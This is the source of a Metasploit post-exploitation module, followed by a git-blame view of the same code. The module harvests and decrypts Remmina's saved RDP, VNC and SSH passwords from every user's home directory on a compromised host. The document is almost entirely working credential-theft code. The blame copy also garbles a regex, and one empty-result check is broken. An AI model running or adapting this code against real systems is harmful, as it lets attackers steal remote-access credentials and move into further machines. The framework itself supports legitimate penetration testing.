metasploit-framework/modules/post/multi/gather/remmina_creds.rb

# encoding: binary
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(
      info,
      'Name'          => 'UNIX Gather Remmina Credentials',
      'Description'   =>
        "Post module to obtain credentials saved for RDP and VNC
        from Remmina's configuration files.  These are
        encrypted with 3DES using a 256-bit key generated by
        Remmina which is (by design) stored in (relatively)
        plain text in a file that must be properly protected.",
      'License'       => MSF_LICENSE,
      'Author'        => ['Jon Hart <jon_hart[at]rapid7.com>'],
      'Platform'      => %w(bsd linux osx unix),
      'SessionTypes'  => %w(shell meterpreter)
    ))
  end

  def run
    creds = extract_all_creds
    creds.uniq!
    if creds.empty? == 0
      print_status('No Reminna credentials collected')
    else
      vprint_good("Collected #{creds.size} sets of Remmina credentials")
      cred_table = Rex::Ui::Text::Table.new(
        'Header'  => 'Remmina Credentials',
        'Indent'  => 1,
        'Columns' => %w(Host Port Service User Password)
      )

      creds.each do |cred|
        cred_table << cred
      end

      print_line(cred_table.to_s)
    end
  end

  def decrypt(secret, data)
    c = OpenSSL::Cipher::Cipher.new('des3')
    key_data = Base64.decode64(secret)
    # the key is the first 24 bytes of the secret
    c.key = key_data[0, 24]
    # the IV is the last 8 bytes of the secret
    c.iv = key_data[24, 8]
    # passwords less than 16 characters are padded with nulls
    c.padding = 0
    c.decrypt
    p = c.update(Base64.decode64(data))
    p << c.final
    # trim null-padded, < 16 character passwords
    p.gsub(/\x00*$/, '')
  end

  # Extracts all remmina creds found anywhere on the target
  def extract_all_creds
    creds = []
    user_dirs = enum_user_directories
    if user_dirs.empty?
      print_error('No user directories found')
    else
      vprint_status("Searching for Remmina creds in #{user_dirs.size} user directories")
      # walk through each user directory
      enum_user_directories.each do |user_dir|
        remmina_dir = ::File.join(user_dir, '.remmina')
        pref_file = ::File.join(remmina_dir, 'remmina.pref')
        next unless file?(pref_file)

        remmina_prefs = get_settings(pref_file)
        if remmina_prefs.empty?
          print_error("Unable to extract Remmina settings from #{pref_file}")
          next
        end

        secret = remmina_prefs['secret']
        if secret
          vprint_status("Extracted secret #{secret} from #{pref_file}")
        else
          print_error("No Remmina secret key found in #{pref_file}")
          next
        end

        # look for any  \d+\.remmina files which contain the creds
        cred_files = []
        dir(remmina_dir).each do |entry|
          if entry =~ /^\d+\.remmina$/
            cred_files << ::File.join(remmina_dir, entry)
          end
        end

        if cred_files.empty?
          vprint_status("No Remmina credential files in #{remmina_dir}")
        else
          creds |= extract_creds(secret, cred_files)
        end
      end
    end
    creds
  end

  def extract_creds(secret, files)
    creds = []
    files.each do |file|
      settings = get_settings(file)
      if settings.empty?
        print_error("No settings found in #{file}")
        next
      end

      # get protocol, host, user
      proto = settings['protocol']
      host = settings['server']
      case proto
      when 'RDP'
        port = 3389
        user = settings['username']
      when 'VNC'
        port = 5900
        domain = settings['domain']
        if domain.blank?
          user = settings['username']
        else
          user = domain + '\\' + settings['username']
        end
      when 'SFTP', 'SSH'
        user = settings['ssh_username']
        port = 22
      else
        print_error("Unsupported protocol: #{proto}")
        next
      end

      # get the password
      encrypted_password = settings['password']
      if encrypted_password.blank?
        # in my testing, the box to save SSH passwords was disabled.
        password = nil
      else
        password = decrypt(secret, encrypted_password)
      end

      if host && user && password
        creds << [ host, port, proto.downcase, user, password ]
      else
        missing = []
        missing << 'host' unless host
        missing << 'user' unless user
        missing << 'password' unless password
        vprint_error("No #{missing.join(',')} in #{file}")
      end
    end
    creds
  end

  def get_settings(file)
    settings = {}
    read_file(file).split("\n").each do |line|
      if line =~ /^\s*([^#][^=]+)=(.*)/
        settings[Regexp.last_match(1)] = Regexp.last_match(2)
      end
    end
    settings
  end
end
Binary encoding 2014-08-01 00:34:58 +00:00			`# encoding: binary`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Post`
			`include Msf::Post::File`
			`include Msf::Post::Unix`

			`def initialize(info = {})`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`super(update_info(`
			`info,`
			`'Name' => 'UNIX Gather Remmina Credentials',`
			`'Description' =>`
			`"Post module to obtain credentials saved for RDP and VNC`
			`from Remmina's configuration files. These are`
			`encrypted with 3DES using a 256-bit key generated by`
			`Remmina which is (by design) stored in (relatively)`
			`plain text in a file that must be properly protected.",`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Jon Hart <jon_hart[at]rapid7.com>'],`
			`'Platform' => %w(bsd linux osx unix),`
			`'SessionTypes' => %w(shell meterpreter)`
			`))`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`

			`def run`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds = extract_all_creds`
			`creds.uniq!`
			`if creds.empty? == 0`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`print_status('No Reminna credentials collected')`
			`else`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`vprint_good("Collected #{creds.size} sets of Remmina credentials")`
			`cred_table = Rex::Ui::Text::Table.new(`
			`'Header' => 'Remmina Credentials',`
			`'Indent' => 1,`
			`'Columns' => %w(Host Port Service User Password)`
			`)`

			`creds.each do \|cred\|`
			`cred_table << cred`
			`end`

			`print_line(cred_table.to_s)`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`
			`end`

			`def decrypt(secret, data)`
			`c = OpenSSL::Cipher::Cipher.new('des3')`
			`key_data = Base64.decode64(secret)`
Correct some Rubocop things that I agree with 2014-08-01 00:34:17 +00:00			`# the key is the first 24 bytes of the secret`
			`c.key = key_data[0, 24]`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`# the IV is the last 8 bytes of the secret`
Correct some Rubocop things that I agree with 2014-08-01 00:34:17 +00:00			`c.iv = key_data[24, 8]`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`# passwords less than 16 characters are padded with nulls`
			`c.padding = 0`
			`c.decrypt`
			`p = c.update(Base64.decode64(data))`
			`p << c.final`
			`# trim null-padded, < 16 character passwords`
			`p.gsub(/\x00*$/, '')`
			`end`

			`# Extracts all remmina creds found anywhere on the target`
			`def extract_all_creds`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds = []`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`user_dirs = enum_user_directories`
			`if user_dirs.empty?`
			`print_error('No user directories found')`
			`else`
			`vprint_status("Searching for Remmina creds in #{user_dirs.size} user directories")`
			`# walk through each user directory`
			`enum_user_directories.each do \|user_dir\|`
			`remmina_dir = ::File.join(user_dir, '.remmina')`
			`pref_file = ::File.join(remmina_dir, 'remmina.pref')`
			`next unless file?(pref_file)`

			`remmina_prefs = get_settings(pref_file)`
			`if remmina_prefs.empty?`
			`print_error("Unable to extract Remmina settings from #{pref_file}")`
			`next`
			`end`

			`secret = remmina_prefs['secret']`
			`if secret`
Remove excessive logging 2014-08-01 00:51:39 +00:00			`vprint_status("Extracted secret #{secret} from #{pref_file}")`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`else`
			`print_error("No Remmina secret key found in #{pref_file}")`
			`next`
			`end`

			`# look for any \d+\.remmina files which contain the creds`
			`cred_files = []`
			`dir(remmina_dir).each do \|entry\|`
			`if entry =~ /^\d+\.remmina$/`
			`cred_files << ::File.join(remmina_dir, entry)`
			`end`
			`end`

			`if cred_files.empty?`
			`vprint_status("No Remmina credential files in #{remmina_dir}")`
			`else`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds \|= extract_creds(secret, cred_files)`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`
			`end`
			`end`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`

			`def extract_creds(secret, files)`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds = []`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`files.each do \|file\|`
			`settings = get_settings(file)`
			`if settings.empty?`
			`print_error("No settings found in #{file}")`
			`next`
			`end`

			`# get protocol, host, user`
			`proto = settings['protocol']`
			`host = settings['server']`
			`case proto`
			`when 'RDP'`
			`port = 3389`
			`user = settings['username']`
			`when 'VNC'`
			`port = 5900`
			`domain = settings['domain']`
			`if domain.blank?`
			`user = settings['username']`
			`else`
			`user = domain + '\\' + settings['username']`
			`end`
			`when 'SFTP', 'SSH'`
			`user = settings['ssh_username']`
			`port = 22`
			`else`
			`print_error("Unsupported protocol: #{proto}")`
			`next`
			`end`

			`# get the password`
			`encrypted_password = settings['password']`
			`if encrypted_password.blank?`
			`# in my testing, the box to save SSH passwords was disabled.`
			`password = nil`
			`else`
			`password = decrypt(secret, encrypted_password)`
			`end`

Convert Remmina credential gatherer to use new credentials model 2014-10-08 19:32:52 +00:00			`if host && user && password`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds << [ host, port, proto.downcase, user, password ]`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`else`
If remmina config files are missing data for creds, tell me what 2014-10-08 19:48:49 +00:00			`missing = []`
			`missing << 'host' unless host`
			`missing << 'user' unless user`
			`missing << 'password' unless password`
			`vprint_error("No #{missing.join(',')} in #{file}")`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`
			`end`
Rip out create_credential* stuff. Use what works 2014-10-30 23:11:13 +00:00			`creds`
Add Remmina RDP/SSH/VNC password gathering 2014-08-01 00:15:19 +00:00			`end`

			`def get_settings(file)`
			`settings = {}`
			`read_file(file).split("\n").each do \|line\|`
			`if line =~ /^\s([^#][^=]+)=(.)/`
			`settings[Regexp.last_match(1)] = Regexp.last_match(2)`
			`end`
			`end`
			`settings`
			`end`
			`end`